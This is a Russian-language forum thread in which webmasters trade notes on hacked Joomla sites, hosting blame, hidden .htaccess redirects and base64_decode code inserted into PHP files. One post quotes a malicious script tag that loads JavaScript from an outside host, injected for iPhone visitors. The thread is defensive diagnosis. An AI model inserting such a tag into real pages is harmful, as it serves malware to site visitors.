Работа плагина Marco's- System - Marco's SQL Injection - LFI Interceptor
Не продолжение,а последствия изменений в работе скриптов,после атаки хакера.
Проверяйте отключение регистрации на сайте и без подтверждения админом.
Ищите редирект в .htaccess и вставки кода base64_decode в скриптах .php
Инфа в свободном доступе.
Так timeweb хоть признал свою ошибку.
Я хочу определить кто виновник,скрипты Джумла,которые используют Curl или дырявый хостинг.
3s777
curl_exec — Выполняет запрос cURL
А хостер клиента,не руг.ру, съезжает на старую Джумла 1.5.А скрипт пишется и Джумла 2.5.
Не хотят работать.
Вопрос к знающим- а поможет отключение curl_exec,на запрет соединения с чужим сервером для загрузки "левого" яваскрипт ?
Эт повезло что хостер быстро отреагировал.Вчера 13:44 Chained
Хостер моего клиента молчит,и два сайта в черном списке.
У клиента на другом хостинге аналогичная проблема.Яндекс внес в черный список из-за мобильного редиректа.При заходе с под iPhoneMobile Safari,
появляется в head яваскрипт <script type="text/javascript" src="http://html.sdnsistems.net/ldr.php?912015284"></script>. Один раз для одного IP.
Вчера клиент обращалась к хостеру,тот в отказ.
Файлы сайтов на движке Джумла,проверены на все известные редиректы, вирусы,шелл.
Я так понимаю взлом на уровне ОС,и уязвимость свежая за июнь 2013.
ну и мой уже работает.
и у меня на сейчас сайт недоступен.запиарилися кирхост.и предьявить нечего-в договоре не забыли указать о снятии ответственности в случае поломки на линиях и оборудовании не принадлежащим кирхосту.